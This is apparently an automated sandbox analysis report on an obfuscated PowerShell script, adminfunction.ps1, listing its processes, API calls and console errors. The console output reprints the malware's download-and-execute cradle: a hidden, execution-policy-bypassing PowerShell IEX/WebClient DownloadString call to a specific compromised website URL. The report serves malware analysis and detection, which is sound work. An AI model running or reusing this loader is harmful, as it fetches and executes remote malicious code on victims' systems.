Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 14, 2023, 5:11 p.m.	May 14, 2023, 5:36 p.m.

Size	940.0B
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`116867a52a3e60cc2eb90e5888a70cdd`
SHA256	`61c3a348213704b575c6a8e5e5640714f7b0b8e4cc706f9b6dbdb166eb17ae53`
CRC32	`752591AD`
ssdeep	`24:ZTTTTTTTTTj44F8lfNwz9ehF8cDVOPdCmWjtTC:ZTTTTTTTTTj44ylfN2eh7BOFPWjtO`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\adminfunction.ps1
2544
- replace.exe "C:\Windows\system32\replace.exe" "UiaCvLamQWeAUvcXaLa8QaZKlAmNaZZlAqErQDrAmNVVaZZlakEGGjLaMnBVCEWqHaLaMIxxXaLaYbValEqQQaSXUbCXzASQwwEQkLUvcXaLa8QaZTTlFAmAZlWXaAOiER4EsAXaEzGlVraMazerLaQGlVraMazerLaQ UiaCvLamQWeA w" UvcXaLa8QaZ s
  2668
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" KlAmNaZZlAqErQ c
  2716
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" DrAmNVVaZZlakE r
  2788
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" GGjLaMnBVCEWq i
  2844
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" HaLaMIxxXaLa p
  2896
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" YbValEqQQaSX t
  2944
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" UbCXzASQwwEQkL .
  2992
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" TTlFAmAZlWXaA h
  3040
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" OiER4EsAXaEz e
  812
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" GlVraMazerLaQ l
  1404
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced"
  1336

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (50 out of 52 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: Set-Variable : A positional parameter cannot be found that accepts argument 'Cr console_handle: 0x00000023	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: eateObject'. console_handle: 0x0000002f	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\adminfunction.ps1:1 char:4 console_handle: 0x0000003b	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: + Set <<<< talamzvc = CreateObject(Replace(Replace(Replace(Replace(Replace(Rep console_handle: 0x00000047	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: lace(Replace(Replace(Replace(Replace(Replace("UiaCvLamQWeAUvcXaLa8QaZKlAmNaZZlA console_handle: 0x00000053	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: qErQDrAmNVVaZZlakEGGjLaMnBVCEWqHaLaMIxxXaLaYbValEqQQaSXUbCXzASQwwEQkLUvcXaLa8Qa console_handle: 0x0000005f	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: ZTTlFAmAZlWXaAOiER4EsAXaEzGlVraMazerLaQGlVraMazerLaQ", "UiaCvLamQWeA", "w"), "U console_handle: 0x0000006b	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: vcXaLa8QaZ", "s"), "KlAmNaZZlAqErQ", "c"), "DrAmNVVaZZlakE", "r"), "GGjLaMnBVCE console_handle: 0x00000077	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: Wq", "i"), "HaLaMIxxXaLa", "p"), "YbValEqQQaSX", "t"), "UbCXzASQwwEQkL", "."), console_handle: 0x00000083	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: "TTlFAmAZlWXaA", "h"), "OiER4EsAXaEz", "e"), "GlVraMazerLaQ", "l")) console_handle: 0x0000008f	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: + CategoryInfo : InvalidArgument: (:) [Set-Variable], ParameterBi console_handle: 0x0000009b	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: ndingException console_handle: 0x000000a7	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: + FullyQualifiedErrorId : PositionalParameterNotFound,Microsoft.PowerShell console_handle: 0x000000b3	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: .Commands.SetVariableCommand console_handle: 0x000000bf	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: The term 'vcnmlake' is not recognized as the name of a cmdlet, function, script console_handle: 0x000000df	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: file, or operable program. Check the spelling of the name, or if a path was in console_handle: 0x000000eb	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: cluded, verify that the path is correct and try again. console_handle: 0x000000f7	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\adminfunction.ps1:2 char:9 console_handle: 0x00000103	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: + vcnmlake <<<< = ("POWeRS") console_handle: 0x0000010f	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: + CategoryInfo : ObjectNotFound: (vcnmlake:String) [], CommandNot console_handle: 0x0000011b	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: FoundException console_handle: 0x00000127	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000133	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: The term 'talamzvc.Run' is not recognized as the name of a cmdlet, function, sc console_handle: 0x00000023	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: ript file, or operable program. Check the spelling of the name, or if a path wa console_handle: 0x0000002f	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: s included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\adminfunction.ps1:3 char:13 console_handle: 0x00000047	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: + talamzvc.Run <<<< ((vcnmlake)+"HeLL.eXe -WIND HIDDeN -eXeC BYPASS -NONI $pola console_handle: 0x00000053	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: masfs2a='IeX(NeW-OBJeCT NeT.W';$ublamw21al='eBCLIeNT).DOWNLO';Sleep 2;[BYTe[]]; console_handle: 0x0000005f	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: Sleep 3;$iblmaksb2aq='lkmanvcxas2a(''https://www.joshbystrom.com/wp-admin/image console_handle: 0x0000006b	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: s/bubble_bg22.SVG'')'.RePLACe('lkmanvcxas2a','ADSTRING');Sleep 1;IeX($polamasfs console_handle: 0x00000077	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: 2a+$ublamw21al+$iblmaksb2aq);"), CONSOLE_HIDE, CMD_WAIT console_handle: 0x00000083	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: + CategoryInfo : ObjectNotFound: (talamzvc.Run:String) [], Comman console_handle: 0x0000008f	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: dNotFoundException console_handle: 0x0000009b	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000000a7	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: Set-Variable : A positional parameter cannot be found that accepts argument 'No console_handle: 0x000000c7	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: thing'. console_handle: 0x000000d3	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\adminfunction.ps1:4 char:4 console_handle: 0x000000df	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: + Set <<<< ali = Nothing console_handle: 0x000000eb	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: + CategoryInfo : InvalidArgument: (:) [Set-Variable], ParameterBi console_handle: 0x000000f7	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: ndingException console_handle: 0x00000103	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: + FullyQualifiedErrorId : PositionalParameterNotFound,Microsoft.PowerShell console_handle: 0x0000010f	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: .Commands.SetVariableCommand console_handle: 0x0000011b	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: Invalid switch - s console_handle: 0x00000013	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: Invalid switch - c console_handle: 0x00000013	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: Invalid switch - r console_handle: 0x00000013	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: Invalid switch - i console_handle: 0x00000013	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: Invalid switch - p console_handle: 0x00000013	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: Invalid switch - t console_handle: 0x00000013	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: Invalid switch - . console_handle: 0x00000013	1	1
WriteConsoleW May 14, 2023, 5:11 p.m.	buffer: Invalid switch - h console_handle: 0x00000013	1	1

Uses Windows APIs to generate a cryptographic key (8 events)

Time & API	Arguments	Status	Return
CryptExportKey May 14, 2023, 5:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x065117a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x065117a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x065117a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x065117a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x065117a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x065117a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x065117a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 14, 2023, 5:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x065117a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 14, 2023, 5:11 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (17 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 14, 2023, 5:11 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f9b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:11 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01faf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:11 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f79000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:11 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06340000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:11 p.m.	process_identifier: 2544 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:11 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:11 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063d1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:11 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:11 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:11 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06341000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:11 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06342000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:11 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06343000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:11 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06344000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:11 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:11 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:11 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06345000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:11 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05700000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

One or more non-whitelisted processes were created (11 events)

parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" HaLaMIxxXaLa p
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" UbCXzASQwwEQkL .
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" GlVraMazerLaQ l
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" YbValEqQQaSX t
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" KlAmNaZZlAqErQ c
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" TTlFAmAZlWXaA h
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" GGjLaMnBVCEWq i
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" OiER4EsAXaEz e
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "UiaCvLamQWeAUvcXaLa8QaZKlAmNaZZlAqErQDrAmNVVaZZlakEGGjLaMnBVCEWqHaLaMIxxXaLaYbValEqQQaSXUbCXzASQwwEQkLUvcXaLa8QaZTTlFAmAZlWXaAOiER4EsAXaEzGlVraMazerLaQGlVraMazerLaQ UiaCvLamQWeA w" UvcXaLa8QaZ s
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced"
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" DrAmNVVaZZlakE r

The process powershell.exe wrote an executable file to disk (1 event)

file	C:\Windows\System32\replace.exe

adminfunction.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All